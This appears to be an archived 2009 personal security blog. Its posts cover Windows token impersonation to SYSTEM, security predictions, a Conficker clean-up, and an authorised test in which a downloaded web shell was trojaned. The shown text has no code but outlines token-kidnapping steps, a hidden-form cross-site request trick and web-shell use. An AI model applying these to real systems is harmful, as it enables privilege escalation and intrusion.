How do I createprocess under SYSTEM if I run as admin? Just get the Systemtoken, and impersonate to it.
What is impersonation?
Impersonation is the ability of a thread to
execute using different security information than
the process that owns the thread
– Threads impersonate to run code under another user
account, ACL checks are done against the
impersonated users
– Impersonation can only be done by processes
with the following privilege:
-...(SeImpersonatePrivilege)
–When a thread impersonates it has an associated
impersonation token

An access token is an object that describes the
security context of a process or thread
– It includes the identity and privileges of the user
account associated with the process or thread
– They can be Primary or Impersonation tokens
• Primary ones are those that are assigned to
processes
• Impersonation ones are those that can be get
when impersonation occurs
– Four impersonation levels: SecurityAnonymous,
SecurityIdentity, SecurityImpersonation,
SecurityDelegation

Windows XP & 2003
– An APC can be submitted to a thread
• QueueUserAPC() can be called with
ImpersonateSelf() as parameter
• Thread starts to impersonate service account
• Impersonation token is get by OpenThreadToken()
• Token is used to access the process
• Token handles are brute forced in target process
until SYSTEM token is found
• SYSTEM token is used to run code
If a user can impersonate then game is over (my remark : every Admin user can impersonate to SYSTEM, which is the point of this post).
• User can execute code as SYSTEM [my remark] which means ADMIN can *always* execute code as SYSTEM.

Impersonate/token information is taken from : http://www.argeniss.com/research/TokenKidnapping.pdf

I hope you understand now why SYSTEM isn't really stronger than Admin. And the next time someone tries to run privilege escalation if he's an Admin already, just explain to him that he doesn't have to do so to become system and he can use legit API to run as SYSTEM.

Have a great week!

My Security Assumptions to 2010

2009-12-23T14:20:00.000+02:00

Hey there,
I've seen many sites/people talk about their field of expertise predictions to 2010. I've decided to make my own ~~predictions~~ assumptions (:)) regarding computer security in 2010.

Here's my prediction :
1. Conficker - Updating itself through a new vulnerability, public or zero day. Through that, attacker s would be able to reach compromised computers using the Conficker P2P protocol which allows signed files by conficker writters to be shared in the same network. In my opinion, conficker was written much before the MS08-067 discovery. Conficker writers have finished the design of the worm and most of the code before the release of the MS08-067 and just waited for the right stable exploitable bug to come up. Like that, they will wait for the next one to come-up and reach most of the infected computers out there and start make profit out of it.
Nice conficker neat tricks from SANS diary

2. First multi-vector attacking worm - Unlike many worms (even l0lworm) who has one or more attack vectors (p2p files, password guessing, remote exploits, etc), I think, in 2010 we'll encounter multi-vector attacking worm which will use many remote exploits to attack in the same network or world-wide. This worm will also be using other techniques already seen such as password guessing, file-infections for p2p files, Disk on Key infections, e-mail sending containing malicious pdf files, etc, etc, etc. One thing which I'm truly afraid from is bots used for sql-injections / brute-force attacks for websites and by that inserting malicious iframes/code for infecting great amount of websites which will infect tons of people. Lots of techniques in the same worm would be very very dangerous, I can see it coming.
3. Malicious writers wouldn't target low-level for widely spread trojan/worm/... . Why am I thinking positive about this one? Well, some stuff we've seen on 2008/2009 were mostly PoCs but not widely spread (except Mebroot). Virus writers want something that the end-user wouldn't notice, and spreading a wide low-level-changing payload on lots of people, will cause trouble to some of them. It's just not worth it.
4. Anti-Viruses - Kaspersky will remain the best anti-virus also in 2010. Symantec which currently far far behind and considered a joke among some of the security researchers will try harder this year, but still, it wouldn't be enough. Free anti-viruses will be still growing and gaining more installs.

5. SQL Injections in big open-source platforms will be the main infection method in 2010 in my opinion (well, without taking in mind remote-exploits :)). Sites will be vulnerable to SQL Injections which will add client-side attacks in iframes/same page. Except of trying to get 1 site that will infect people, using widely spread sql injection in many sites running the same platform, malware writers would be able to exploit them all, without website's admin notice (most of the times) that his pages serves as infection pages.

6. Virus writers targeting Linux - Nope, not yet.

7. Virus writers targeting Mac - Not sure about that. I think this one will actually start getting more infections, but it's quite risky to say. (Unrelated) Although, one worm had spread recently using jail-broken default password for IPHONES. I think this year will be interesting to see regarding iphones and blackberrys.

8. Google - I think that by the end of this year the will open their own ISP/Service CALL Provider. Using their phones, they will allow free calls over the net from android phones to android phones, like BB messages, but in google's phones. Interesting to see a big competition to iphones and blackberrys.

9. Consoles - I think, this year, the PS3 might get hacked to run burnt copies of their games. Why? because Sony is losing money to Microsoft that made a really easy to crack system. Wait, What? are you saying that Sony will provide a way to run "back-up" cds? Not sure, they might. Probably in the next console they will not make that hard encryption, that's for sure (but that's not going to happen in 2010 as far as I know). I think there might be a chance of someone spreading a trojaned game for XBOX360 in one of those torrent sites. Before you know it, your XBOX360 will be a bot (I'm not sure it's possible with digital signatures and such, but if it is, I think it's a big risk).

10. Vulnerabilities - ADOBE will keep up the [sarcasm alert] good work [/sarcasm alert] being target for many security researchers (as well as the bad guys). Windows will not be immune to remote & local exploits this year. Firefox/IE will definitely have some client-side failures which will be used on 2 and 5 above.

Hopefully you liked it,

That's the big things I think will happen in 2010, I've written it while I'm quite ill, but didn't want to miss the chance of posting it before 2010, so enjoy it and hopefully I will feel better tomorrow and the horrible stuff I've written and will delete it all. haha.

Happy holidays.

Tracking malware sites down

2009-12-13T15:39:00.001+02:00

The trojaned-shellcode incident was behind me (read this first), but I've decided to check its payload and perhaps discover any zero-day being used in this infrastructure of malicious sites.I've taken the cached js that I got, and started to investigate them. This is what I got :This script is trying to contact different malicious sites :WARNING! DO NOT ATTEMPT TO GO INTO THOSE SITES, it's on your own risk.[I've switched the TEXTAREA to photo since AVAST interpret those lines as a false positive for a JS-Dropper, so I didn't want to scare anyone and will just upload SS of the code instead :)]

and it continues :

I've tried to enter each one of them, to get the code, and all I got was :

Which definitely looks suspicious, so I've translated it to the following (you can do that most of the times by running the same code but instead of eval just write alert, this is the unobfuscated code

So... Both sites

are not working at the moment, Error 502 (Cannot find server or DNS Error). So no more analysis can be done on my part, but it seems that those sites had probably infected lots of people using some kind of PDF exploit within embedded pdf file. Payload/shellcode or other exploit code would have downloaded to the sites through this line :

Which didn't work at the moment as-well.So, too bad for me that those sites are not working at the moment because I can't analyze them now, but it's good for other internet users that are not getting infected by those drop-off sites.p.s,Entering to some of those sites seem that those sites had been reported suspicious and will give the following firefox error :

using POST in XSRF

2009-12-04T17:35:00.000+02:00

a friend of mine had asked me if it's possible to do an XSRF with POST message without server in the middle, then yes, it is :

Just add a post that isn't seen, and get the element of the button, press it yourself.
You control the element, right? :)

p.s,
I'm currently at SANS London 2009 event, if you're here, make sure you drop me a message :)

Cheers.

PyFFDebugger - Python inside firefox

2009-12-02T13:30:00.000+02:00

just copying this post out of my OPENRCE blog post :
Few weeks ago I've started to write a wrapper to mozrepl, which I find quite useful. The wrapper is a python interface to controlling javascript/DOM within a current firefox session. Imagine what you can do with python within firefox? it's amazing!. You can find old versions of it (I will upload new soon) at sourceforge. PyFFDebugger SourceForge page

Examples of what you can do with it : (there are better one, keep it to yourself):

1. Bypass Megaupload/Rapidshare timeouts/whatever.
2. Send automatic messages,status updates, etc on facebook.
3. Fuzz websites and skip client security checks.
4. XSS assistant for automatic process which in-order to check results. etc

The fuzzer and XSS assistant are currently in development. Hopefully soon I'll publish those.

Cheers from SANS London 2009 Event,
Itzhak Avraham

Conficker isn't gone. delayed impact incident

2009-11-30T14:34:00.001+02:00

Weeks ago, I came back from work at probably 18:30 P.M.
So far, it's all good. right?
Wrong!
Around 19:30 I got a call that says : "leave anything you do and come to ******* (Vendor name removed - will be called "Gas-Supplier" from now on) Headquarter, there's a worm spreading and it's rebooting any computer of their operational network"
Let me stop here for a second and explain what kind of type "Gas-Supplier" is, "Gas-Supplier" is one of the biggest fuel station in the country. It has more than 200 stations.

So, I've arrived quickly around (20:00 p.m) to see that everybody their is stress. Every person who tries to get fuel in one of these gas-stations, cannot do so, because the computer that responsible to it, gets rebooted every 1 minute.
The first step was checking which worm was spreading and preventing it from further spread. Firewall had been put between every station to each-other on ports 445/135.
Quick scan of the station from remote showed up that those computers are Windows 2000, SP4, Not fully patched. In-fact, they were vulnerable to almost any remote attack to SMB/RPC.

You don't have time to patch [it crushes every minute, till every services like workstation service or other services for remote control [RPC] it takes like 20 seconds, and crushes after 30-40 seconds], them from remote (and they are all around the country, so going single station at the time isn't practical).
That was the time I understood I'm going to be there all night. The CEO, a person who earns millions every-year, sat behind me for sometime and hold his head and I could have hear his self-worries, the fear in his eyes that this will be published the next day.

So, I've tried to figure out remotely what was the problem, it didn't work well because of the crashes I've written above and the slow connection between the VPNs.
I went with 2 workers of "Gas-Supplier", to the closest station, and we checked which virus is causing the computers to crash.
Quickly, an anti-virus on safe-mode showed that it's infected with Conficker (B/C), Kido/ DownUp or any other name that applies to this worm.
So, now we know which worm it is. Should be easier to patch, right? well.. not really.
The conditions to patch it from remote were extremely bad. I've built scripts that copy Kaspersky's Conficker removal tool, that needs to run for a few minutes, but the computer shuts after 1 minutes, because Conficker wasn't written good enough for Windows 2000 SP4 and makes the services.exe crash.
One of the programmer's for "Gas-Supplier" gave me a tool that message-pump the Shutdown event so it basically gave me 5:00 minutes before services.exe crashes the computer and reboots it.
This is a message to conficker writers, please next time, don't crash services.exe on Windows 2000. If it's not safe for you to inject code, don't! You ruined my night :)
So I've remotely put some start-up scripts do dis-infect the computers using the Kaspersky conficker removal tool (which is much better than Norton's removal tool in my opinion) and another one to patch the affected computer.
Did it all night long, on few computer simultaneously (I had to catch it when they were up and not rebooting).
done by 6.00 A.M.

Statistics :
0 News reports about it.
1,000,000$++ made since by that "Gas-Supplier"
2 coffee
1 double espresso
2 days off afterward
1 weird-nice experience.

Cheers.

Trojaned Shell - mystery solved

2009-11-25T12:58:00.000+02:00

Once upon a time, I had a client, which requested for a full BlackBox attack on his networks. One of the IPs I got was a website which had an application I've found a vulnerability which allowed me to upload files to the remote server.

Long story short, I've uploaded a shell for aspx files, simply by going to google and googling : "aspx shell" and the first result was actually what I needed to save my time and not writing my own shell.

Google Result. So, I've checked my shell, line by line, to see if that's okay, and indeed it looked great. I've managed to hack inside the website and even got Domain Administrator afterward.

Great news... why am I telling you this you probably ask yourself, that's why, I had a funny incident few weeks later. I've hacked to another website and used the same shell again, this time, I just googled it and didn't validate the code. But when I've entered my remote page at the victim's site (client), I've seen my browser goes to different websites which he can not resolve, that's why I immediately suspected I got a browser-malware, or any other process that injected code to my browser.

One thing I want to clarify, I don't use Anti-Virus, simply, because I don't believe in them. If you've ever tried it, you know it's not hard to bypass anti-virus so he won't recognize your piece of code. I monitor my computer like a lunatic, I check if my SSDT has hooks almost every-day :). I follow on which dlls are on each process, checks services, autoruns verify, etc etc etc. like I said, lunatic :).

That's why it was weird to me that I've seen the browser goes to weird places in wireshark, including some malicious sites. It was weird since I was only in one page, which I know what's the content of (since I've uploaded it to the server) and I don't do anything else which requires internet connection.
Immediately I've started to Debug my firefox, look for suspicious strings in memory, check every single dll it had loaded, checked for arp poisoning if someone is injecting me any FRAME, absolutely NOTHING!

I've started to think that my firefox came trojaned, when I've seen that in one of the scans the anti-viruses I got to check if I got something popular, saw an infected file at the SOURCE-CODE of firefox, which I've downloaded from mozilla. It was extreamly weird, too bad I've forgotten to turn of the automatic delete (since it had deleted, I couldn't examine it) - so I was sure at that point that the same virus that attacked me, had searched for the code, and put malicious code in Firefox source-code as-well! (and I actually was happy to see such a nice malicious code way of spreading :)) - but that's probably a false positive).

(screenshot of BitDefender result's).

By the way, that source-code bz2 file from mozilla, I havn't actually installed it, but used to check some sources where I've thought there's a little bug. Luckily it's open-source, right?

Anyways, I couldn't find anything else on my computer, no more weird sniffing in wire-shark, and almost decided to format my computer, when I've decided that it only appeared on that page.

Well.. I've entered to the same page, again, and viewed the source, directly it appeared to me : THE SHELL-CODE WAS TROJANED. The malicious sites that my browser tried to go to were pages which were reportedly drop-off for malicious software :
Google Safe-Browsing report for omochacha[dot]com

Those lines appeared in the trojaned source-code :
quite obvious, right? indeed. I've tried to download those js files for analysis, but couldn't download them (404). When I've seen the weird errors, that means the JS download from the script had worked, that's why it tried to contact bunch of other sites like the one a report has been posted above. I've tried to look if the shell-code had arrived trojaned or became infected on my computer and seen a cached google page which indicates I've probably googled it and got it trojaned in the 2nd time I've downloaded it. GOOGLE CACHE Result for the same shell + some "EXTRA SURPRISES" I will try to see if there's any cache for it, and will try to analyze it. I will be going to SANS conference in London this Friday, so I won't have lots of time blogging, but till next time, cheers :)